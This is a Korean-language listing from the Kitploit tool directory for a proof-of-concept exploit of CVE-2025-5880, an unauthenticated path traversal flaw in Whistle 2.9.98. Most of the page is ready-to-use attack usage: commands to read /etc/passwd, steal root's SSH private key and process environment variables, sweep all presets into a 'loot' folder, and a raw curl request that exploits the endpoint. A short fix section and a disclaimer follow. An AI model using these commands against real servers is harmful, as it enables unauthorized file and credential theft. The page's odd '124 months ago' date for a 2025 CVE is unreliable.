Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-5880-PoC — Whistle v2.9.98에서 인증되지 않은 경로 탐색 취약점에 대한 개념 증명 익스플로잇입니다. | Kitploit
도구/GitHubGitHub/yacine-rm/cve-2025-5880-poc
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & Education
GitHubyacine-rm/cve-2025-5880-poc

CVE-2025-5880-PoC

Whistle v2.9.98에서 인증되지 않은 경로 탐색 취약점에 대한 개념 증명 익스플로잇입니다.

저장소 보기
124개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2025-5880 — Whistle 2.9.98 경로 탐색 PoC

Python CVE CWE License

Whistle v2.9.98의 인증되지 않은 경로 탐색 취약점에 대한 개념 증명 익스플로잇.


취약점 요약

필드세부 정보
CVE IDCVE-2025-5880
CWECWE-22 (경로 탐색)
영향 받는 소프트웨어Whistle ≤ 2.9.98
영향 받는 엔드포인트/cgi-bin/sessions/get-temp-file
공격 벡터네트워크 — 인증 불필요
영향호스트 파일 시스템의 임의 파일 읽기

filename 쿼리 매개변수는 디스크의 파일을 열기 전에 검증되지 않으므로, 공격자가 의도된 임시 파일 디렉토리를 벗어나 Whistle 프로세스가 접근 권한을 가진 모든 파일(예: /etc/passwd, /root/.ssh/id_rsa)을 읽을 수 있습니다.


빠른 시작

root@kitploit:~
# Clone
git clone https://github.com/YourHandle/CVE-2025-5880
cd CVE-2025-5880

# No external dependencies
python3 CVE-2025-5880.py -u http://TARGET:8899 --preset passwd

사용법

root@kitploit:~
python3 CVE-2025-5880.py [-h] -u URL [-f FILE] [--preset PRESET]
                          [--sweep] [-o OUTPUT] [--save-dir DIR]
                          [--timeout N]
플래그설명
-u / --url대상의 기본 URL (예: http://192.168.1.10:8899)
-f / --file읽을 임의의 파일 경로
--preset이름 단축키: passwd shadow hosts id_rsa …
--sweep모든 프리셋 자동 반복
-o / --output결과를 파일로 저장
--save-dir--sweep 결과를 저장할 디렉토리
--timeoutHTTP 타임아웃 (초 단위, 기본값 10)

예시

root@kitploit:~
# Read /etc/passwd
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset passwd

# Grab root's SSH private key
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --preset id_rsa -o id_rsa.pem

# Read an arbitrary path
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 -f /proc/self/environ

# Sweep & save all presets
python3 CVE-2025-5880.py -u http://192.168.1.10:8899 --sweep --save-dir ./loot


원시 PoC (curl)

root@kitploit:~
# /etc/passwd
curl -s "http://TARGET:8899/cgi-bin/sessions/get-temp-file?filename=/etc/passwd" | jq -r '.value'

수정 방법

Whistle을 filename 매개변수를 검증하고 의도된 임시 파일 디렉토리로 제한하는 버전으로 업데이트하세요. 서버 측에서 허용 목록 경로 정규화(예: path.resolve + 접두사 확인)를 적용하세요.


면책 조항

이 도구는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다.
귀하가 소유하지 않거나 명시적 테스트 허가를 받지 않은 시스템에 대한 무단 사용은 불법이며 비윤리적입니다.
작성자는 오용에 대한 책임을 지지 않습니다.

도구 다운로드